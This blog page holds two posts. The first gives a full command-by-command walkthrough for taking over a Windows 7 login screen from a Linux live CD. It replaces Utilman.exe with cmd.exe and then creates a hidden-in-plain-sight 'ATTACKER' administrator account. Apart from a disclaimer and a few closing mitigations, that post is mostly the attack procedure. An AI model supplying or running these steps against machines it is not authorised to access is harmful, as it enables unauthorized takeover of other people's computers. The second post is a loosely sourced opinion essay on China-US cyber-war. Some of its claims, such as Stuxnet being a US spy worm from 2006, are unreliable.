Wednesday, October 9, 2013

How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 7 Computer


Disclaimer:  First of all I would like to let you know that I don't held responsible for the misuse of the information stated here.  This blog is only to let people know about the vulnerabilities, bugs, and security vectors that are out there since the companies that posses them do not even talk about it, so I bring it to the light to make people more aware of this issue.  Since the first 10 amendments (the bill of rights) gives me the right to share information, here it is because knowledge is power.

 Nowadays, someone does not need to know a lot about security's inner-workings of the Windows 7 Operating System to take total control of it.  This simple procedure is so simple even a 10 year old can do it with the need of ONLY a Linux live CD or DVD (even a flash drive) to boot with BIOS.  This procedure I like to call it application hijacking and there is no fix or way to defend this in the Windows Operating System side. However it can be diminished by putting a password on the BIOS but even that way it can be bypassed by taking the CMOS battery out resetting the BIOS password completely. This way will be too notorious if the owner of the computer  checks the BIOS and realizes there is no prompt for password but it might be too late...

So here it is. First, we can see the Window Log in is totally normal. This attack relies on the "Ease of Access" button which helps people with dissabilities use the Operating System providing them with magnifying glass, on-screen keyboard, voice recognition, etc.  As the name states "Easy of Access" now it becomes "Ease of Penetration Access" :)





With this said, we will try booting on BIOS but first we need to configure so it boots with CD-ROM, DVD-ROM or Flash-Drive (however your preference is).





After this, we boot with Linux. For this lab, we will use one of my favourites distros: Kali Linux (aka Backtrack 6).



We wait until all files, hardware, kernel and services are loaded and we will get prompted with the desktop. You can try it with CLI or GUI. It really does not matter as long as you use this proper commands:




First we create a directory where we will mount the physical hard-drive (where Windows 7 resides on).  Note /dev/sda# will be your hard-drive if you are using SATA drive and /dev/hda# if you are using IDE hard-drive.


#mkdir /media/harddrive
#mount /dev/sda1 /media/harddrive/

Now we will proceed to the hihjacking process but first we will make a backup to the "ease of access" file which is called "utilman.exe".

#cd /media/harddrive/
#cd Windows\
#cd System32\
# mv Utilman.exe Utilman.Backup.exe

Now let's do the hijacking process with cmd.exe :)

#cp cmd.exe Utilman.exe

Reboot the system: 

#reboot



Now it is time to reboot the system, take out the CD, DVD or Flash-Drive, Change BIOS back to normal and let Windows start 




After Windows start, let's click one more time to the "Ease of (Penetration) Access" button and "Viola!!", the CMD.exe window with ADMINISTRATOR privileges appears :)



Now, let's give ourselves Administrator Access with the username "Attacker":

NET USER ATTACKER /ADD
NET LOCALGROUP ADMINISTRATORS ATTACKER /ADD

Let's verify the user attacker is an administrator:

NET USER ATTACKER

You can also verify by seeing who is in our Administrator's group:

NET LOCALGROUP ADMINISTRATORS
EXIT 





Now it is time to login with our newly-super-user account:




Let's verify that the account we just logged in has administrator rights: 




The lesson of this lab is not to teach anybody to break rules but to make users aware of the dangers big profit-glutton corporations like Microsoft.  You can help securing your computer form this attack by 1) Disabling CD-ROM/DVD-ROM and USB External Storage. 2) Putting a BIOS password and 3) Removing CD-ROM, DVD-ROMs or buying a computer with not USB connections :-D

Big cheers to RS who made me aware of this security vector.

I hope you enjoyed it!

Wednesday, February 27, 2013

Shanghai Hackers and The “Obscured” Cyber-War?




Technology deals with a huge part in our lives. Everyday we are consciously and unconsciously concerned about it mostly because we were grown into it and are very used to it because we all count with it everyday. Most consumers think technology is our friend, but what does the government think and use technology? You will be amazed in how different are the two perspectives. When regular consumers are anxiously waiting for the next “cool gadget” with built-in biometric technology to come out, the US government is fighting against huge power-outages, Denial of Service attacks, network traffic sniffing, unauthorized backdoor access and other hacking techniques coming mainly from China. This interesting contrast reflects how technology can be used for good and also bad.


Government DOSed, defaced websites taken down, oil rigs computers infected by malware, huge bot-nets managed by zombie university computers attacking government systems, spying wall-street journal newspaper and leaking national top-secret documents to the whole world, using SQL injection to share a whole governmental database (user credentials) to the web; even Google to obtain social-security numbers from Americans are all examples of a current “catastrophic cyber-war”; also known as the new “virtual pearl harbor”. (http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&accountid=27655). The news are making all of us afraid of a cyber war but who are attacking who? Who are the suspected victims? Who are the targets? What are the allegations? And the most important: Where are they located? All these questions are making people afraid, hiding the truth. The truth is plain and simple. We should not have more fear than to governments attacking governments all around the globe.


The US government is recruiting going from 800 to 5,000 security specialists and gray-hat hackers to help governments steal data, disrupting operations, and playing a cat-mouse game which never ends. “[Government fighting government with virtual weapons] is the most dangerous and concerning technological threat in our lives” -Bruce Schneier. We are all aware about the fact that China is attacking the US government. According with Syndigate.info, 16 percent of observed cyber attacks came from China in the second quarter of the year” 2013 (http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&accountid=27655). While the government is tracking China (their suspected attacker) for as long as China started to see the U.S. as the arch-enemy due to the fact Bush started the war on the middle east. As far as proves, there are many. Several US government entities (NSA, Pentagon ,White House, etc), newspapers (Wall-street Journal), credit-card companies (Master-card, VISA); even really popular sites such as Google and Facebook (http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html).

While the U.S. is being attacked from China, the US is monitoring its more successful invention: Stuxnet. Stuxnet is a military worm which has been invented by US Government and Israelis to spy on “terrorists”. Stuxnet has been invented in 2006 to make the US aware of other government's plans, and spy on whoever they would like. It is being a success because it is really difficult to detect and is infecting thousand of worldwide computers acting stealthy and sneaky in order to have the less noticeable behavior possible. Other than Stuxnet which has been public, who knows what other “stuxnets” are out there that are being also unnoticeable from other governments...

According to Bruce Schneier on a Keynote at Internetdagarna 2011, the two things that are really difficult of knowing in regards of a cyber attack, are “who is attacking and why, and that is what makes cyber-defense so difficult”. Also he said that with today's technology, anybody (even a kid) can do serious damage to a computer connected to the internet, including government websites using SQL injection techniques, launching DOS attacks and even guessing (brute-force) a default password set on a router sitting elsewhere configured by a negligent system administrator. Even though the risk is out there and according to the attack vectors, new rules, protocols and procedures are being put in place by governments (Government urged to set cyber standards: http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&accountid=27655). Even though some regulations might seem OK to diminish (not prevent) cyber terrorism, little by little our freedoms are at stake. For that reason a good, solid standard procedure should be put in place which makes us feel safer and actually make us safer. Security is a trade-off. One has to risk something to get security back, but what you can never, and I mean NEVER trade for security is freedom. Just like Benjamin Franklin once said “One that trades security for freedom, does not deserve security nor freedom”. So what approach do we choose to be more secure not only from cyber-vandalists and script-kiddies but also from the governments?


According to Antone Gonsalves February 22nd, 2013 (http://readwrite.com/2013/02/22/no-cyberwar-with-china), cyber-war is not here yet because “Real cyberwar would start with an attack that destroys something valuable or vital, kills people, or both.” Does it really make killing people and vital resources a real cyber-war? I think it is a matter of perspective and with time we will realize that cyber-war will be more human-like wars.


I believe a way to prevent cyber terrorism is to stop being afraid of news and what the media and governments say. The main goal for a terrorist is to “make terror”. According to Webster-Merriam dictionary, terrorism is “the systematic use of terror especially as a means of coercion”(http://www.merriam-webster.com/dictionary/terrorism). I highly think reinforcing general policies in general such as: military control instead of focusing on every power-grid in the US skyrocketing their expenses for useless outcomes. Also, another example to protect society from cyber attack and also physical attack is to reinforce rules and regulations on schools instead of putting additional guards in every school in the country to prevent sad kids from shooting everybody during his/her class. The point is that it is mostly psychological. It is true everyday more and more websites, databases, organizations, governments and financial institutions are being breached and being posted at pastebin and their own sites for everyone to see (for example Anonymous and Wikileaks).


What is important is to realize that is more psychological than fact and to put into perspective general solutions and counter-measure the threats instead of being too specific and “micro-manage” things because we will fail most of the times. It is also important to note that security relies on two factors: feeling secure (psychological) and being secure (facts). It is totally useless to rely on the most expensive and best-configured firewalls if you don't train your employees from not divulging important
information and keep them happy so no one goes “to the other side of the road” and buy you out just like Bradley Manning. The most important is to be educated and to live a little bit more carefree.


Sources:

Hackers take down U.S. government website by Xinhua News Agency - CEIS [Woodside] 26 Jan 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&accountid=27655
Chinese cyber attacks on Western firms, governments 'growing': Experts by Asian News International [New Delhi] 02 Feb 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&accountid=27655
Government urged to set cyber standards Press, Jordan. The Gazette [Montreal, Que] 22 Feb 2013
http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&accountid=27655

How researcher Hacked Facebook Oauth To Get Full Permission On Any Facebook Account
Reported by Sabari Selvan on Friday, February 22, 2013 |
http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html
U.S. presents plan against industrial cyber-espionage: US GOVERNMENT by EFE News Service [Madrid] 20 Feb 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1289100384/abstract?source=fedsrch&accountid=27655

Why We're Not In A Cyberwar With China by Antone Gonsalves February 22nd, 2013
http://readwrite.com/2013/02/22/no-cyberwar-with-china

Bruce Schneier - Keynote at Internetdagarna 2011 http://www.youtube.com/watch?v=dhzk9ZDhObw

Webster Dictionary: Terrorism Definition